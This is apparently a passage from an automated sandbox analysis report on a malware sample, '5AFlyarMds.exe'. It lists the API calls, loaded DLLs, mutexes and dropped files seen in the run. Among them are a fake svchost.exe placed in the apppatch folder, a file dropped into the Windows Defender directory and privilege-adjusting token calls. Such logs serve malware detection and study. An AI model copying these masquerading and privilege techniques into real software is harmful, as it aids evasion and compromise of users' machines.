    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02CB5930 GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,1_2_02CB5930
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 5_2_02F85930 #680,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle,5_2_02F85930
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 6_2_02575930 #680,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle,6_2_02575930
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 8_2_025E5930 #680,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle,8_2_025E5930
    Source: C:\Users\user\Desktop\5AFlyarMds.exeCode function: 0_2_00401CF0 Sleep,memset,CreateToolhelp32Snapshot,CreateToolhelp32Snapshot,GetLastError,SwitchToThread,CreateToolhelp32Snapshot,GetHandleInformation,CloseHandle,Module32First,StrStrIA,Module32Next,StrStrIA,StrStrIA,Module32Next,0_2_00401CF0
    Source: C:\Users\user\Desktop\5AFlyarMds.exeCode function: 0_2_00402680 CoInitializeEx,GetModuleFileNameW,SysAllocString,SysAllocString,SysAllocString,CoCreateInstance,CoCreateInstance,VirtualAllocEx,CoCreateInstance,SysFreeString,SysFreeString,SysFreeString,CoUninitialize,0_2_00402680
    Source: C:\Windows\apppatch\svchost.exeFile created: C:\Program Files (x86)\Windows Defender\vocyzit.comJump to behavior
    Source: C:\Windows\apppatch\svchost.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\login[1].htmJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMutant created: NULL
    Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7092
    Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6828
    Source: C:\Windows\apppatch\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\5DD2BD1Da
    Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6636
    Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6976
    Source: C:\Users\user\Desktop\5AFlyarMds.exeFile created: C:\Users\user\AppData\Local\Temp\D4B2.tmpJump to behavior
    Source: 5AFlyarMds.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Users\user\Desktop\5AFlyarMds.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: 5AFlyarMds.exeString found in binary or memory: -help
    Source: svchost.exeString found in binary or memory: -help
    Source: C:\Users\user\Desktop\5AFlyarMds.exeFile read: C:\Users\user\Desktop\5AFlyarMds.exeJump to behavior
    Source: unknownProcess created: C:\Users\user\Desktop\5AFlyarMds.exe "C:\Users\user\Desktop\5AFlyarMds.exe"
    Source: C:\Users\user\Desktop\5AFlyarMds.exeProcess created: C:\Windows\apppatch\svchost.exe "C:\Windows\apppatch\svchost.exe"
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6636 -s 804
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7092 -s 800
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6976 -s 748
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6828 -s 760
    Source: C:\Users\user\Desktop\5AFlyarMds.exeProcess created: C:\Windows\apppatch\svchost.exe "C:\Windows\apppatch\svchost.exe"Jump to behavior
    Source: C:\Users\user\Desktop\5AFlyarMds.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\Desktop\5AFlyarMds.exeSection loaded: version.dllJump to behavior
    Source: C:\Users\user\Desktop\5AFlyarMds.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Users\user\Desktop\5AFlyarMds.exeSection loaded: winmm.dllJump to behavior
    Source: C:\Users\user\Desktop\5AFlyarMds.exeSection loaded: inetcomm.dllJump to behavior
    Source: C:\Users\user\Desktop\5AFlyarMds.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Users\user\Desktop\5AFlyarMds.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Users\user\Desktop\5AFlyarMds.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Users\user\Desktop\5AFlyarMds.exeSection loaded: msoert2.dllJump to behavior
    Source: C:\Users\user\Desktop\5AFlyarMds.exeSection loaded: oleacc.dllJump to behavior
    Source: C:\Users\user\Desktop\5AFlyarMds.exeSection loaded: inetres.dllJump to behavior
    Source: C:\Users\user\Desktop\5AFlyarMds.exeSection loaded: vmhgfs.dllJump to behavior
    Source: C:\Users\user\Desktop\5AFlyarMds.exeSection loaded: netapi32.dllJump to behavior
    Source: C:\Users\user\Desktop\5AFlyarMds.exeSection loaded: samcli.dllJump to behavior
    Source: C:\Users\user\Desktop\5AFlyarMds.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\user\Desktop\5AFlyarMds.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\Desktop\5AFlyarMds.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\Desktop\5AFlyarMds.exeSection loaded: mpclient.dllJump to behavior
    Source: C:\Users\user\Desktop\5AFlyarMds.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Users\user\Desktop\5AFlyarMds.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Users\user\Desktop\5AFlyarMds.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\Desktop\5AFlyarMds.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\Desktop\5AFlyarMds.exeSection loaded: firewallapi.dllJump to behavior
    Source: C:\Users\user\Desktop\5AFlyarMds.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Users\user\Desktop\5AFlyarMds.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\5AFlyarMds.exeSection loaded: fwbase.dllJump to behavior
    Source: C:\Users\user\Desktop\5AFlyarMds.exeSection loaded: fwpolicyiomgr.dllJump to behavior
    Source: C:\Users\user\Desktop\5AFlyarMds.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\apppatch\svchost.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Windows\apppatch\svchost.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\apppatch\svchost.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Windows\apppatch\svchost.exeSection loaded: winmm.dllJump to behavior
    Source: C:\Windows\apppatch\svchost.exeSection loaded: inetcomm.dllJump to behavior
    Source: C:\Windows\apppatch\svchost.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\apppatch\svchost.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\apppatch\svchost.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\apppatch\svchost.exeSection loaded: msoert2.dllJump to behavior
    Source: C:\Windows\apppatch\svchost.exeSection loaded: oleacc.dllJump to behavior
    Source: C:\Windows\apppatch\svchost.exeSection loaded: inetres.dllJump to behavior
    Source: C:\Windows\apppatch\svchost.exeSection loaded: vmhgfs.dllJump to behavior
    Source: C:\Windows\apppatch\svchost.exeSection loaded: netapi32.dllJump to behavior
    Source: C:\Windows\apppatch\svchost.exeSection loaded: samcli.dllJump to behavior
    Source: C:\Windows\apppatch\svchost.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\apppatch\svchost.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\apppatch\svchost.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\apppatch\svchost.exeSection loaded: mpclient.dllJump to behavior
    Source: C:\Windows\apppatch\svchost.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\apppatch\svchost.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\apppatch\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\apppatch\svchost.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\apppatch\svchost.exeSection loaded: firewallapi.dllJump to behavior
    Source: C:\Windows\apppatch\svchost.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Windows\apppatch\svchost.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\apppatch\svchost.exeSection loaded: fwbase.dllJump to behavior
    Source: C:\Windows\apppatch\svchost.exeSection loaded: fwpolicyiomgr.dllJump to behavior
    Source: C:\Windows\apppatch\svchost.exeSection loaded: winscard.dllJump to behavior
    Source: C:\Windows\apppatch\svchost.exeSection loaded: devobj.dllJump to behavior
    Source: C:\Windows\apppatch\svchost.exeSection loaded: sensapi.dllJump to behavior
    Source: C:\Windows\apppatch\svchost.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\apppatch\svchost.exeSection loaded: dbghelp.dllJump to behavior
    Source: C:\Windows\apppatch\svchost.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Windows\apppatch\svchost.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Windows\apppatch\svchost.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\apppatch\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Windows\apppatch\svchost.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Windows\apppatch\svchost.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Windows\apppatch\svchost.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Windows\apppatch\svchost.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Windows\apppatch\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Windows\apppatch\svchost.exeSection loaded: schannel.dllJump to behavior
    Source: C:\Windows\apppatch\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
    Source: C:\Windows\apppatch\svchost.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Windows\apppatch\svchost.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\apppatch\svchost.exeSection loaded: dpapi.dllJump to behavior
    Source: C:\Windows\apppatch\svchost.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\apppatch\svchost.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\apppatch\svchost.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\apppatch\svchost.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\apppatch\svchost.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Windows\apppatch\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
    Source: C:\Windows\apppatch\svchost.exeSection loaded: napinsp.dllJump to behavior
    Source: C:\Windows\apppatch\svchost.exeSection loaded: pnrpnsp.dllJump to behavior
    Source: C:\Windows\apppatch\svchost.exeSection loaded: wshbth.dllJump to behavior
    Source: C:\Windows\apppatch\svchost.exeSection loaded: nlaapi.dllJump to behavior
    Source: C:\Windows\apppatch\svchost.exeSection loaded: winrnr.dllJump to behavior
    Source: C:\Windows\apppatch\svchost.exeSection loaded: winsta.dllJump to behavior
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: winscard.dllJump to behavior
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: devobj.dllJump to behavior
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: sensapi.dllJump to behavior
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: dbghelp.dllJump to behavior
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: netapi32.dllJump to behavior
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: samcli.dllJump to behavior
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: winscard.dllJump to behavior
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: devobj.dllJump to behavior
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: sensapi.dllJump to behavior
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: dbghelp.dllJump to behavior
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: netapi32.dllJump to behavior
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: samcli.dllJump to behavior
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: winscard.dllJump to behavior
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: devobj.dllJump to behavior
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: sensapi.dllJump to behavior
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: dbghelp.dllJump to behavior
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: netapi32.dllJump to behavior
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: samcli.dllJump to behavior
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: winscard.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: devobj.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: sensapi.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: iphlpapi.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: dbghelp.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: netapi32.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: samcli.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: netutils.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: dnsapi.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: wininet.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: windows.storage.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: wldp.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: sspicli.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: iertutil.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: profapi.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: kernel.appcore.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: winscard.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: devobj.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: sensapi.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: iphlpapi.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: dbghelp.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: netapi32.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: samcli.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: netutils.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: dnsapi.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: wininet.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: windows.storage.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: wldp.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: sspicli.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: iertutil.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: profapi.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: kernel.appcore.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: winscard.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: devobj.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: sensapi.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: iphlpapi.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: dbghelp.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: netapi32.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: samcli.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: netutils.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: dnsapi.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: wininet.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: windows.storage.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: wldp.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: sspicli.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: iertutil.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: profapi.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: kernel.appcore.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: winscard.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: devobj.dll
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeSection loaded: sensapi.dll
